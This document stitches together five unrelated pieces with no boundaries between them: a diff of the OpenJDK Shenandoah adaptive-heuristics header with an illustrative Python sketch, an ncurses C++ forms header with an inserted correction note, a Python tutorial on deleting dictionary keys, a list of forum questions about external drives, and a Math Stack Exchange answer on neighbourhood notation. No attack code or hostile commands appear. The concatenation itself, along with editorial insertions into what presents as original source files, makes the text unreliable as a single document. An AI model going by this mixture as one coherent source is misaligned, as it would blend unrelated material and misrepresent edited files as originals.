src/hotspot/share/gc/shenandoah/heuristics/shenandoahAdaptiveHeuristics.hpp

@@ -1,7 +1,8 @@
 /*
  * Copyright (c) 2018, 2019, Red Hat, Inc. All rights reserved.
+ * Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
  * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
  *
  * This code is free software; you can redistribute it and/or modify it
  * under the terms of the GNU General Public License version 2 only, as
  * published by the Free Software Foundation.
@@ -23,12 +24,16 @@
  */

 #ifndef SHARE_GC_SHENANDOAH_HEURISTICS_SHENANDOAHADAPTIVEHEURISTICS_HPP
 #define SHARE_GC_SHENANDOAH_HEURISTICS_SHENANDOAHADAPTIVEHEURISTICS_HPP

+#include "runtime/globals_extension.hpp"
+#include "memory/allocation.hpp"
 #include "gc/shenandoah/heuristics/shenandoahHeuristics.hpp"
+#include "gc/shenandoah/heuristics/shenandoahSpaceInfo.hpp"
 #include "gc/shenandoah/shenandoahPhaseTimings.hpp"
+#include "gc/shenandoah/shenandoahSharedVariables.hpp"
 #include "utilities/numberSeq.hpp"

 class ShenandoahAllocationRate : public CHeapObj<mtGC> {
  public:
   explicit ShenandoahAllocationRate();
@@ -36,11 +41,10 @@
   double sample(size_t allocated);

   double upper_bound(double sds) const;
   bool is_spiking(double rate, double threshold) const;
-
  private:
   double instantaneous_rate(double time, size_t allocated) const;

   double _last_sample_time;
@@ -48,22 +52,33 @@
   double _interval_sec;
   TruncatedSeq _rate;
   TruncatedSeq _rate_avg;
 };

+/*
+ * The adaptive heuristic tracks the allocation behavior and average cycle
+ * time of the application. It attempts to start a cycle with enough time
+ * to complete before the available memory is exhausted. It errs on the
+ * side of starting cycles early to avoid allocation failures (degenerated
+ * cycles).
+ *
+ * This heuristic limits the number of regions for evacuation such that the
+ * evacuation reserve is respected. This helps it avoid allocation failures
+ * during evacuation. It preferentially selects regions with the most garbage.
+ */
 class ShenandoahAdaptiveHeuristics : public ShenandoahHeuristics {
 public:
-  ShenandoahAdaptiveHeuristics();
+  ShenandoahAdaptiveHeuristics(ShenandoahSpaceInfo* space_info);

   virtual ~ShenandoahAdaptiveHeuristics();

   virtual void choose_collection_set_from_regiondata(ShenandoahCollectionSet* cset,
                                                      RegionData* data, size_t size,
                                                      size_t actual_free);

   void record_cycle_start();
-  void record_success_concurrent();
+  void record_success_concurrent(bool abbreviated);
   void record_success_degenerated();
   void record_success_full();

   virtual bool should_start_gc();
@@ -96,15 +111,16 @@
   void adjust_last_trigger_parameters(double amount);

   void adjust_margin_of_error(double amount);
   void adjust_spike_threshold(double amount);

+protected:
   ShenandoahAllocationRate _allocation_rate;

   // The margin of error expressed in standard deviations to add to our
   // average cycle time and allocation rate. As this value increases we
-  // tend to over estimate the rate at which mutators will deplete the
+  // tend to overestimate the rate at which mutators will deplete the
   // heap. In other words, erring on the side of caution will trigger more
   // concurrent GCs.
   double _margin_of_error_sd;

   // The allocation spike threshold is expressed in standard deviations.
@@ -123,8 +139,10 @@
   // Keep track of the available memory at the end of a GC cycle. This
   // establishes what is 'normal' for the application and is used as a
   // source of feedback to adjust trigger parameters.
   TruncatedSeq _available;
+
+  size_t min_free_threshold();
 };

 #endif // SHARE_GC_SHENANDOAH_HEURISTICS_SHENANDOAHADAPTIVEHEURISTICS_HPP
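To make the trigger logic described in the new comment block concrete, here is a minimal, hedged sketch of the idea in Python pseudocode. This is not the HotSpot implementation; the function and parameter names are illustrative stand-ins for the fields visible in the diff (_margin_of_error_sd, _allocation_rate, _available).

    # Hypothetical sketch of the adaptive trigger described above, NOT the
    # actual HotSpot code. Idea: start a concurrent cycle early enough that
    # it finishes before the mutators exhaust the remaining free memory.
    def should_start_gc(avg_cycle_time_s, cycle_time_sd_s,
                        avg_alloc_rate_bps, alloc_rate_sd_bps,
                        available_bytes, margin_of_error_sd):
        # Pad both estimates by a configurable number of standard deviations.
        # A larger margin overestimates how fast mutators deplete the heap,
        # so cycles trigger earlier (more concurrent GCs, fewer degenerated ones).
        padded_cycle_time = avg_cycle_time_s + margin_of_error_sd * cycle_time_sd_s
        padded_alloc_rate = avg_alloc_rate_bps + margin_of_error_sd * alloc_rate_sd_bps

        # Bytes the mutators are expected to allocate while a cycle runs.
        expected_allocation = padded_cycle_time * padded_alloc_rate
        return expected_allocation > available_bytes

    # 0.07 s padded cycle * 3e9 B/s padded rate = 2.1e8 B expected,
    # which exceeds the 1.5e8 B available, so a cycle would start now.
    print(should_start_gc(0.05, 0.01, 2e9, 5e8, 1.5e8, 2.0))  # True

The real heuristic additionally watches for allocation spikes (see is_spiking and _spike_threshold_sd in the header), which this sketch omits.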
contrib/ncurses/c++/cursesf.h:

// * This makes emacs happy -*-Mode: C++;-*-
/****************************************************************************
 * Copyright (c) 1998 Free Software Foundation, Inc.                        *
 *                                                                          *
 * Permission is hereby granted, free of charge, to any person obtaining a  *
 * copy of this software and associated documentation files (the            *
 * "Software"), to deal in the Software without restriction, including      *
 * without limitation the rights to use, copy, modify, merge, publish,      *
 * distribute, distribute with modifications, sublicense, and/or sell       *
 * copies of the Software, and to permit persons to whom the Software is    *
 * furnished to do so, subject to the following conditions:                 *
 *                                                                          *
 * The above copyright notice and this permission notice shall be included  *
 * in all copies or substantial portions of the Software.                   *
 *                                                                          *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS  *
 * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF               *
 * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.   *
 * IN NO EVENT SHALL THE ABOVE COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,   *
 * DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR    *
 * OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR    *
 * THE USE OR OTHER DEALINGS IN THE SOFTWARE.                               *
 *                                                                          *
 * Except as contained in this notice, the name(s) of the above copyright   *
 * holders shall not be used in advertising or otherwise to promote the     *
 * sale, use or other dealings in this Software without prior written       *
 * authorization.                                                           *
 ****************************************************************************/

/****************************************************************************
 *   Author: Juergen Pfeifer <[email protected]> 1997                        *
 ****************************************************************************/

// $Id: cursesf.h,v 1.10 1999/05/16 17:31:42 juergen Exp $

#ifndef _CURSESF_H
#define _CURSESF_H

#include <cursesp.h>

extern "C" {
#  include <form.h>
}

//
// -------------------------------------------------------------------------
// The abstract base class for builtin and user defined Fieldtypes.
// -------------------------------------------------------------------------
//
class NCursesFormField; // forward declaration

// Class to represent builtin field types as well as C++ written new
// fieldtypes (see classes UserDefinedFieldType...)
class NCursesFieldType {
  friend class NCursesFormField;

protected:
  FIELDTYPE* fieldtype;

  inline void OnError(int err) const THROWS(NCursesFormException) {
    if (err != E_OK)
      THROW(new NCursesFormException(err));
  }

  NCursesFieldType(FIELDTYPE *f) : fieldtype(f) {
  }

  virtual ~NCursesFieldType() {}

  // Set the field f's fieldtype to this one.
  virtual void set(NCursesFormField& f) = 0;

public:
  NCursesFieldType() : fieldtype((FIELDTYPE*)0) {
  }
};

//
// -------------------------------------------------------------------------
// The class representing a forms field, wrapping the lowlevel FIELD struct
// -------------------------------------------------------------------------
//
class NCursesFormField {
  friend class NCursesForm;

protected:
  FIELD *field;             // lowlevel structure
  NCursesFieldType* ftype;  // Associated field type

  // Error handler
  inline void OnError (int err) const THROWS(NCursesFormException) {
    if (err != E_OK)
      THROW(new NCursesFormException (err));
  }

public:
  // Create a 'Null' field. Can be used to delimit a field list.
  NCursesFormField()
    : field((FIELD*)0), ftype((NCursesFieldType*)0) {
  }

  // Create a new field
  NCursesFormField (int rows,
                    int cols,
                    int first_row = 0,
                    int first_col = 0,
                    int offscreen_rows = 0,
                    int additional_buffers = 0)
    : ftype((NCursesFieldType*)0) {
    field = ::new_field(rows, cols, first_row, first_col,
                        offscreen_rows, additional_buffers);
    if (!field)
      OnError(errno);
  }

  virtual ~NCursesFormField ();

  // Duplicate the field at a new position
  inline NCursesFormField* dup(int first_row, int first_col) {
    NCursesFormField* f = new NCursesFormField();
    if (!f)
      OnError(E_SYSTEM_ERROR);
    else {
      f->ftype = ftype;
      f->field = ::dup_field(field, first_row, first_col);
      if (!f->field)
        OnError(errno);
    }
    return f;
  }

  // Link the field to a new location
  inline NCursesFormField* link(int first_row, int first_col) {
    NCursesFormField* f = new NCursesFormField();
    if (!f)
      OnError(E_SYSTEM_ERROR);
    else {
      f->ftype = ftype;
      f->field = ::link_field(field, first_row, first_col);
      if (!f->field)
        OnError(errno);
    }
    return f;
  }

  // Get the lowlevel field representation
  inline FIELD* get_field() const {
    return field;
  }

  // Retrieve info about the field
  inline void info(int& rows, int& cols,
                   int& first_row, int& first_col,
                   int& offscreen_rows, int& additional_buffers) const {
    OnError(::field_info(field, &rows, &cols,
                         &first_row, &first_col,
                         &offscreen_rows, &additional_buffers));
  }

  // Retrieve info about the field's dynamic properties.
  inline void dynamic_info(int& dynamic_rows, int& dynamic_cols,
                           int& max_growth) const {
    OnError(::dynamic_field_info(field, &dynamic_rows, &dynamic_cols,
                                 &max_growth));
  }

  // For a dynamic field you may set the maximum growth limit.
  // A zero means unlimited growth.
  inline void set_maximum_growth(int growth = 0) {
    OnError(::set_max_field(field, growth));
  }

  // Move the field to a new position
  inline void move(int row, int col) {
    OnError(::move_field(field, row, col));
  }

  // Mark the field to start a new page
  inline void new_page(bool pageFlag = FALSE) {
    OnError(::set_new_page(field, pageFlag));
  }

  // Retrieve whether or not the field starts a new page.
  inline bool is_new_page() const {
    return ::new_page(field);
  }

  // Set the justification for the field
  inline void set_justification(int just) {
    OnError(::set_field_just(field, just));
  }

  // Retrieve the field's justification
  inline int justification() const {
    return ::field_just(field);
  }

  // Set the foreground attribute for the field
  inline void set_foreground(chtype fore) {
    OnError(::set_field_fore(field, fore));
  }

  // Retrieve the field's foreground attribute
  inline chtype fore() const {
    return ::field_fore(field);
  }

  // Set the background attribute for the field
  inline void set_background(chtype back) {
    OnError(::set_field_back(field, back));
  }

  // Retrieve the field's background attribute
  inline chtype back() const {
    return ::field_back(field);
  }

  // Set the padding character for the field
  inline void set_pad_character(int pad) {
    OnError(::set_field_pad(field, pad));
  }

  // Retrieve the field's padding character
  inline int pad() const {
    return ::field_pad(field);
  }

  // Switch on the field's options
  inline void options_on (Field_Options options) {
    OnError (::field_opts_on (field, options));
  }

  // Switch off the field's options
  inline void options_off (Field_Options options) {
    OnError (::field_opts_off (field, options));
  }

  // Retrieve the field's options
  inline Field_Options options () const {
    return ::field_opts (field);
  }

  // Set the field's options
  inline void set_options (Field_Options options) {
    OnError (::set_field_opts (field, options));
  }

  // Mark the field as changed
  inline void set_changed(bool changeFlag = TRUE) {
    OnError(::set_field_status(field, changeFlag));
  }

  // Test whether or not the field is marked as changed
  inline bool changed() const {
    return ::field_status(field);
  }

  // Return the index of the field in the field array of a form,
  // or -1 if the field is not associated to a form
  inline int (index)() const {
    return ::field_index(field);
  }

  // Store a value in a field's buffer. The default buffer is nr. 0
  inline void set_value(const char *val, int buffer = 0) {
    OnError(::set_field_buffer(field, buffer, val));
  }

  // Retrieve the value of a field's buffer. The default buffer is nr. 0
  inline char* value(int buffer = 0) const {
    return ::field_buffer(field, buffer);
  }

  // Set the validation type of the field.
  inline void set_fieldtype(NCursesFieldType& f) {
    ftype = &f;
    f.set(*this); // A good friend may do that...
  }

  // Retrieve the validation type of the field.
  inline NCursesFieldType* fieldtype() const {
    return ftype;
  }
};

//
// -------------------------------------------------------------------------
// The class representing a form, wrapping the lowlevel FORM struct
// -------------------------------------------------------------------------
//
class NCursesForm : public NCursesPanel {
protected:
  FORM* form;  // the lowlevel structure

private:
  NCursesWindow* sub;   // the subwindow object
  bool b_sub_owner;     // is this our own subwindow?
  bool b_framed;        // has the form a border?
  bool b_autoDelete;    // Delete fields when deleting form?

  NCursesFormField** my_fields; // The array of fields for this form

  // This structure is used for the form's user data field to link the
  // FORM* to the C++ object and to provide extra space for a user pointer.
  typedef struct {
    void*              m_user;  // the pointer for the user's data
    const NCursesForm* m_back;  // backward pointer to C++ object
    const FORM*        m_owner;
  } UserHook;

  // Get the backward pointer to the C++ object from a FORM
  static inline NCursesForm* getHook(const FORM *f) {
    UserHook* hook = (UserHook*)::form_userptr(f);
    assert(hook && hook->m_owner == f);
    return (NCursesForm*)(hook->m_back);
  }

  // These are the built-in hook functions in this C++ binding. In C++ we use
  // virtual member functions (see below On_..._Init and On_..._Termination)
  // to provide this functionality in an object oriented manner.
  static void frm_init(FORM *);
  static void frm_term(FORM *);
  static void fld_init(FORM *);
  static void fld_term(FORM *);

  // Calculate FIELD* array for the menu
  FIELD** mapFields(NCursesFormField* nfields[]);

protected:
  // internal routines
  inline void set_user(void *user) {
    UserHook* uptr = (UserHook*)::form_userptr (form);
    assert (uptr && uptr->m_back == this && uptr->m_owner == form);
    uptr->m_user = user;
  }

  inline void *get_user() {
    UserHook* uptr = (UserHook*)::form_userptr (form);
    assert (uptr && uptr->m_back == this && uptr->m_owner == form);
    return uptr->m_user;
  }

  void InitForm (NCursesFormField* Fields[],
                 bool with_frame,
                 bool autoDeleteFields);

  inline void OnError (int err) const THROWS(NCursesFormException) {
    if (err != E_OK)
      THROW(new NCursesFormException (err));
  }

  // this wraps the form_driver call.
  virtual int driver (int c);

  // 'Internal' constructor, builds an object without association to a
  // field array.
  NCursesForm( int lines,
               int cols,
               int begin_y = 0,
               int begin_x = 0)
    : NCursesPanel(lines, cols, begin_y, begin_x),
      form((FORM*)0) {
  }

public:
  // Create form for the default panel.
  NCursesForm (NCursesFormField* Fields[],
               bool with_frame = FALSE,        // reserve space for a frame?
               bool autoDelete_Fields = FALSE) // do automatic cleanup?
    : NCursesPanel() {
    InitForm(Fields, with_frame, autoDelete_Fields);
  }

  // Create a form in a panel with the given position and size.
  NCursesForm (NCursesFormField* Fields[],
               int lines,
               int cols,
               int begin_y,
               int begin_x,
               bool with_frame = FALSE,        // reserve space for a frame?
               bool autoDelete_Fields = FALSE) // do automatic cleanup?
    : NCursesPanel(lines, cols, begin_y, begin_x) {
    InitForm(Fields, with_frame, autoDelete_Fields);
  }

  virtual ~NCursesForm();

  // Set the default attributes for the form
  virtual void setDefaultAttributes();

  // Retrieve current field of the form.
  inline NCursesFormField* current_field() const {
    return my_fields[::field_index(::current_field(form))];
  }

  // Set the form's subwindow
  void setSubWindow(NCursesWindow& sub);

  // Set these fields for the form
  inline void setFields(NCursesFormField* Fields[]) {
    OnError(::set_form_fields(form, mapFields(Fields)));
  }

  // Remove the form from the screen
  inline void unpost (void) {
    OnError (::unpost_form (form));
  }

  // Post the form to the screen if flag is true, unpost it otherwise
  inline void post(bool flag = TRUE) {
    OnError (flag ? ::post_form(form) : ::unpost_form (form));
  }

  // Decorations
  inline void frame(const char *title = NULL, const char* btitle = NULL) {
    if (b_framed)
      NCursesPanel::frame(title, btitle);
    else
      OnError(E_SYSTEM_ERROR);
  }

  inline void boldframe(const char *title = NULL, const char* btitle = NULL) {
    if (b_framed)
      NCursesPanel::boldframe(title, btitle);
    else
      OnError(E_SYSTEM_ERROR);
  }

  inline void label(const char *topLabel, const char *bottomLabel) {
    if (b_framed)
      NCursesPanel::label(topLabel, bottomLabel);
    else
      OnError(E_SYSTEM_ERROR);
  }

  // -----
  // Hooks
  // -----

  // Called after the form gets repositioned in its window.
  // This is especially true if the form is posted.
  virtual void On_Form_Init();

  // Called before the form gets repositioned in its window.
  // This is especially true if the form is unposted.
  virtual void On_Form_Termination();

  // Called after the field became the current field
  virtual void On_Field_Init(NCursesFormField& field);

  // Called before this field is left as current field.
  virtual void On_Field_Termination(NCursesFormField& field);

  // Calculate required window size for the form.
  void scale(int& rows, int& cols) const {
    OnError(::scale_form(form, &rows, &cols));
  }

  // Retrieve number of fields in the form.
  int count() const {
    return ::field_count(form);
  }

  // Make the page the current page of the form.
  void set_page(int page) {
    OnError(::set_form_page(form, page));
  }

  // Retrieve current page number
  int page() const {
    return ::form_page(form);
  }

  // Switch on the form's options
  inline void options_on (Form_Options options) {
    OnError (::form_opts_on (form, options));
  }

  // Switch off the form's options
  inline void options_off (Form_Options options) {
    OnError (::form_opts_off (form, options));
  }

  // Retrieve the form's options
  inline Form_Options options () const {
    return ::form_opts (form);
  }

  // Set the form's options
  inline void set_options (Form_Options options) {
    OnError (::set_form_opts (form, options));
  }

  // Are there more data in the current field after the data shown
  inline bool data_ahead() const {
    return ::data_ahead(form);
  }

  // Are there more data in the current field before the data shown
  inline bool data_behind() const {
    return ::data_behind(form);
  }

  // Position the cursor to the current field
  inline void position_cursor () {
    OnError (::pos_form_cursor (form));
  }

  // Set the current field
  inline void set_current(NCursesFormField& F) {
    OnError (::set_current_field(form, F.field));
  }

  // Provide a default key virtualization. Translate the keyboard
  // code c into a form request code.
  // The default implementation provides a hopefully straightforward
  // mapping for the most common keystrokes and form requests.
  virtual int virtualize(int c);

  // Operators
  inline NCursesFormField* operator[](int i) const {
    if ((i < 0) || (i >= ::field_count (form)))
      OnError (E_BAD_ARGUMENT);
    return my_fields[i];
  }

  // Perform the menu's operation.
  // Return the field where you left the form.
  virtual NCursesFormField* operator()(void);

  // Exception handlers. The default is a Beep.
  virtual void On_Request_Denied(int c) const;
  virtual void On_Invalid_Field(int c) const;
  virtual void On_Unknown_Command(int c) const;
};

//
// -------------------------------------------------------------------------
// This is the typical C++ typesafe way to allow to attach
// user data to a field of a form. It's assumed that the user
// data belongs to some class T. Use T as template argument
// to create a UserField.
// -------------------------------------------------------------------------
//
template<class T> class NCursesUserField : public NCursesFormField {
public:
  NCursesUserField (int rows,
                    int cols,
                    int first_row = 0,
                    int first_col = 0,
                    const T* p_UserData = (T*)0,
                    int offscreen_rows = 0,
                    int additional_buffers = 0)
    : NCursesFormField (rows, cols, first_row, first_col,
                        offscreen_rows, additional_buffers) {
    if (field)
      OnError(::set_field_userptr(field, (void *)p_UserData));
  }

  virtual ~NCursesUserField() {};

  inline const T* UserData (void) const {
    return (const T*)::field_userptr (field);
  }

  inline virtual void setUserData(const T* p_UserData) {
    if (field)
      OnError (::set_field_userptr (field, (void *)p_UserData));
  }
};

//
// -------------------------------------------------------------------------
// The same mechanism is used to attach user data to a form
// -------------------------------------------------------------------------
//
template<class T> class NCursesUserForm : public NCursesForm {
protected:
  // 'Internal' constructor, builds an object without association to a
  // field array.
  NCursesUserForm( int lines,
                   int cols,
                   int begin_y = 0,
                   int begin_x = 0,
                   const T* p_UserData = (T*)0)
    : NCursesForm(lines, cols, begin_y, begin_x) {
    if (form)
      set_user ((void *)p_UserData);
  }

public:
  // Note: the original header declared these parameters as
  // 'NCursesFormField Fields[]'; they are corrected here to pointer arrays
  // to match the NCursesForm base-class constructors they delegate to.
  NCursesUserForm (NCursesFormField* Fields[],
                   bool with_frame = FALSE,
                   bool autoDelete_Fields = FALSE)
    : NCursesForm (Fields, with_frame, autoDelete_Fields) {
  };

  NCursesUserForm (NCursesFormField* Fields[],
                   const T* p_UserData = (T*)0,
                   bool with_frame = FALSE,
                   bool autoDelete_Fields = FALSE)
    : NCursesForm (Fields, with_frame, autoDelete_Fields) {
    if (form)
      set_user ((void *)p_UserData);
  };

  NCursesUserForm (NCursesFormField* Fields[],
                   int lines,
                   int cols,
                   int begin_y = 0,
                   int begin_x = 0,
                   const T* p_UserData = (T*)0,
                   bool with_frame = FALSE,
                   bool autoDelete_Fields = FALSE)
    : NCursesForm (Fields, lines, cols, begin_y, begin_x,
                   with_frame, autoDelete_Fields) {
    if (form)
      set_user ((void *)p_UserData);
  };

  virtual ~NCursesUserForm() {
  };

  inline T* UserData (void) const {
    return (T*)get_user ();
  };

  inline virtual void setUserData (const T* p_UserData) {
    if (form)
      set_user ((void *)p_UserData);
  }
};

//
// -------------------------------------------------------------------------
// Builtin Fieldtypes
// -------------------------------------------------------------------------
//
class Alpha_Field : public NCursesFieldType {
private:
  int min_field_width;

  void set(NCursesFormField& f) {
    OnError(::set_field_type(f.get_field(), fieldtype, min_field_width));
  }

public:
  Alpha_Field(int width)
    : NCursesFieldType(TYPE_ALPHA),
      min_field_width(width) {
  }
};

class Alphanumeric_Field : public NCursesFieldType {
private:
  int min_field_width;

  void set(NCursesFormField& f) {
    OnError(::set_field_type(f.get_field(), fieldtype, min_field_width));
  }

public:
  Alphanumeric_Field(int width)
    : NCursesFieldType(TYPE_ALNUM),
      min_field_width(width) {
  }
};

class Integer_Field : public NCursesFieldType {
private:
  int precision;
  long lower_limit, upper_limit;

  void set(NCursesFormField& f) {
    OnError(::set_field_type(f.get_field(), fieldtype,
                             precision, lower_limit, upper_limit));
  }

public:
  Integer_Field(int prec, long low = 0L, long high = 0L)
    : NCursesFieldType(TYPE_INTEGER),
      precision(prec), lower_limit(low), upper_limit(high) {
  }
};

class Numeric_Field : public NCursesFieldType {
private:
  int precision;
  double lower_limit, upper_limit;

  void set(NCursesFormField& f) {
    OnError(::set_field_type(f.get_field(), fieldtype,
                             precision, lower_limit, upper_limit));
  }

public:
  Numeric_Field(int prec, double low = 0.0, double high = 0.0)
    : NCursesFieldType(TYPE_NUMERIC),
      precision(prec), lower_limit(low), upper_limit(high) {
  }
};

class Regular_Expression_Field : public NCursesFieldType {
private:
  char* regex;

  void set(NCursesFormField& f) {
    OnError(::set_field_type(f.get_field(), fieldtype, regex));
  }

public:
  Regular_Expression_Field(const char *expr)
    : NCursesFieldType(TYPE_REGEXP) {
    regex = new char[1 + ::strlen(expr)];
    (strcpy)(regex, expr);
  }

  ~Regular_Expression_Field() {
    delete[] regex;
  }
};

class Enumeration_Field : public NCursesFieldType {
private:
  char** list;
  int case_sensitive;
  int non_unique_matches;

  void set(NCursesFormField& f) {
    OnError(::set_field_type(f.get_field(), fieldtype,
                             list, case_sensitive, non_unique_matches));
  }

public:
  Enumeration_Field(char* enums[],
                    bool case_sens = FALSE,
                    bool non_unique = FALSE)
    : NCursesFieldType(TYPE_ENUM),
      list(enums),
      case_sensitive(case_sens ? -1 : 0),
      non_unique_matches(non_unique ? -1 : 0) {
  }
};

class IPV4_Address_Field : public NCursesFieldType {
private:
  void set(NCursesFormField& f) {
    OnError(::set_field_type(f.get_field(), fieldtype));
  }

public:
  IPV4_Address_Field() : NCursesFieldType(TYPE_IPV4) {
  }
};

//
// -------------------------------------------------------------------------
// Abstract base class for User-Defined Fieldtypes
// -------------------------------------------------------------------------
//
class UserDefinedFieldType : public NCursesFieldType {
  friend class UDF_Init; // Internal helper to set up statics

private:
  // For all C++ defined fieldtypes we need only one generic lowlevel
  // FIELDTYPE* element.
  static FIELDTYPE* generic_fieldtype;

protected:
  // These are the functions required by the low level libforms functions
  // to construct a fieldtype.
  static bool fcheck(FIELD *, const void*);
  static bool ccheck(int c, const void *);
  static void* makearg(va_list*);

  void set(NCursesFormField& f) {
    OnError(::set_field_type(f.get_field(), fieldtype, &f));
  }

protected:
  // Redefine this function to do a field validation. The argument
  // is a reference to the field you should validate.
  virtual bool field_check(NCursesFormField& f) = 0;

  // Redefine this function to do a character validation. The argument
  // is the character to be validated.
  virtual bool char_check (int c) = 0;

public:
  UserDefinedFieldType() : NCursesFieldType(generic_fieldtype) {
  }
};

//
// -------------------------------------------------------------------------
// Abstract base class for User-Defined Fieldtypes with Choice functions
// -------------------------------------------------------------------------
//
class UserDefinedFieldType_With_Choice : public UserDefinedFieldType {
  friend class UDF_Init; // Internal helper to set up statics

private:
  // For all C++ defined fieldtypes with choice functions we need only one
  // generic lowlevel FIELDTYPE* element.
  static FIELDTYPE* generic_fieldtype_with_choice;

  // These are the functions required by the low level libforms functions
  // to construct a fieldtype with choice functions.
  static bool next_choice(FIELD*, const void *);
  static bool prev_choice(FIELD*, const void *);

protected:
  // Redefine this function to do the retrieval of the next choice value.
  // The argument is a reference to the field to be examined.
  virtual bool next (NCursesFormField& f) = 0;

  // Redefine this function to do the retrieval of the previous choice value.
  // The argument is a reference to the field to be examined.
  virtual bool previous(NCursesFormField& f) = 0;

public:
  UserDefinedFieldType_With_Choice() {
    fieldtype = generic_fieldtype_with_choice;
  }
};

#endif // _CURSESF_H
How to Remove an Element from a Python Dictionary
Aliaksei Yursha | 30 January 2023 | 9 November 2019

1. The del statement for removing a Python dictionary element
2. The dict.pop() function for removing a Python dictionary element
3. Removing multiple elements from a Python dictionary
4. Performance characteristics

Sometimes your Python dictionary contains one or more keys that you want to delete. You can do this in several different ways.

The del statement for removing a Python dictionary element

One approach is to use Python's built-in del statement.

    >>> meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80}
    >>> del meal['fats']
    >>> meal
    {'proteins': 10, 'carbohydrates': 80}

Note that if you try to delete an element by a key that is not present in the dictionary, the Python runtime will raise a KeyError.

    >>> meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80}
    >>> del meal['water']
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
    KeyError: 'water'

The dict.pop() function for removing a Python dictionary element

Another approach is to use the dict.pop() function. The advantage of this method is that it lets you specify a default value to return if the requested key does not exist in the dictionary.

    >>> meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80}
    >>> meal.pop('water', 3000)
    3000
    >>> meal.pop('fats', 3000)
    10
    >>> meal
    {'proteins': 10, 'carbohydrates': 80}

Note that if you do not provide a default value to return and the key does not exist, you will also get a runtime error, just as with del above.

    >>> meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80}
    >>> meal.pop('water')
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
    KeyError: 'water'

Removing multiple elements from a Python dictionary

If you need to remove several elements from a dictionary in one go, Python 3 offers handy list comprehensions, which you can employ for this purpose.

    >>> meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80}
    >>> [meal.pop(key) for key in ['fats', 'proteins']]
    [10, 10]
    >>> meal
    {'carbohydrates': 80}

Note that with the approach above, Python will still crash if one of the passed keys is not in the dictionary. To avoid this problem, you can give dict.pop() a second argument as the default return value.

    >>> meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80}
    >>> [meal.pop(key, None) for key in ['water', 'sugars']]
    [None, None]
    >>> meal
    {'fats': 10, 'proteins': 10, 'carbohydrates': 80}

Performance characteristics

The del statement and dict.pop() have different performance characteristics.

    >>> from timeit import timeit
    >>> timeit("meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80}; del meal['fats']")
    0.12977536499965936
    >>> timeit("meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80}; meal.pop('fats', None)")
    0.21620816600079706

As the timings above show, the del statement is almost twice as fast. However, dict.pop() with a fallback value is safer, since it will help you avoid runtime errors. Use the former if you are sure the keys must be present in the dictionary, and prefer the latter otherwise.

Related article - Python Dictionary
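As an addendum to the multiple-elements section above (an editorial addition, not part of the original article): if you would rather keep the original dictionary intact than mutate it, a dictionary comprehension builds a filtered copy and tolerates missing keys for free.

    # Build a new dict without the unwanted keys; the original is untouched,
    # and absent keys (like 'water' here) cause no error.
    meal = {'fats': 10, 'proteins': 10, 'carbohydrates': 80}
    to_remove = {'fats', 'water'}
    slimmed = {k: v for k, v in meal.items() if k not in to_remove}
    print(slimmed)  # {'proteins': 10, 'carbohydrates': 80}
    print(meal)     # {'fats': 10, 'proteins': 10, 'carbohydrates': 80}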
• Initializing Hard Disk Drive
I've placed an old hard drive in a USB external enclosure to retrieve files. When I try to access the drive, I get a message that the drive has not been initialized. How can I accomplish initializing the drive?
GreggorF (5 points)

• Create new SQL 2008 database in external drive
My local server using SQL 2008 Express is running low on disk space. Is it possible to create new databases or move a database to an external drive? If so, how is it done, configuration-wise? Thanks.
HermanHermit (15 points)

• External CD writer
I have recently purchased a second-hand Memorex CD writer, and although it looks in fine order and will play discs, I cannot get it to copy, write, or burn discs. It is connected to my PC with USB. Do I need a driver or something? If so, how do I go about this? Can anyone help, please?
Gemstone (20 points)

• Connecting external hard drive to VM software
What external hard drives are compatible with VM software?
Ricopersaud (145 points)

• Can a 4-bay external hard drive have different hard drive sizes?
I have a "Mediasonic 3.5-Inch USB 2.0 and eSATA Pro Box 4-Bay Enclosure HF2-SU2S2" and it has 4 hard drive slots. Can each hard drive be a different size, or must they all be the same for it to operate? I'm not trying to RAID; I just want to access 4 hard drives with 1 connection.
Addam303 (10 points)

• USB Disk Initialization
Can anyone give me some tips or software ideas on how to initialize an external hard drive attached by USB? I have had 2 occasions, one with a brand-new HD and one with an HD taken out of an old computer, where Disk Management shows the drive as "Unknown, Not Initialized" and you get the error...
ConFlicker (210 points)

• RAID 0 with an Internal and External Drive?
I was wondering if I would be able to set up my default hard drive and a new external hard drive for RAID 0. My internal disk drive is an ST3160815AS ATA Device (149 GB, IDE), and I have a My Passport Essential 500 GB USB 2.0 Portable External Hard Drive (WDBAAA5000AD6-NESN). Will I be able to have a...
DrApocalypse (5 points)
Mathematics Stack Exchange

Question:
Let $G$ be a graph such that $\deg(v) \ge \frac{|V(G)|}{2}$ for all $v \in V(G)$. Let $p = x_1 x_2 \ldots x_k$ be a longest path in $G$. Show that $N(x_1) \cup N(x_k) \subseteq \{x_1, \ldots, x_k\}$.

What does $N(x_1) \cup N(x_k)$ mean in this context? It's not explained anywhere in my notes or in class.

Answer (accepted):
It means the union of the sets of neighbors of the two vertices, where the neighborhood of a vertex $x$ is
$$N(x) = \{v \in V(G) : \{v, x\} \in E(G)\}.$$
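To make the notation concrete, here is a short worked illustration (an editorial addition; the small example graph below is invented for illustration, not taken from the thread). Take $G$ to be the path on four vertices, $x_1 - x_2 - x_3 - x_4$. Then
$$N(x_1) = \{x_2\}, \quad N(x_4) = \{x_3\}, \quad N(x_1) \cup N(x_4) = \{x_2, x_3\} \subseteq \{x_1, x_2, x_3, x_4\}.$$
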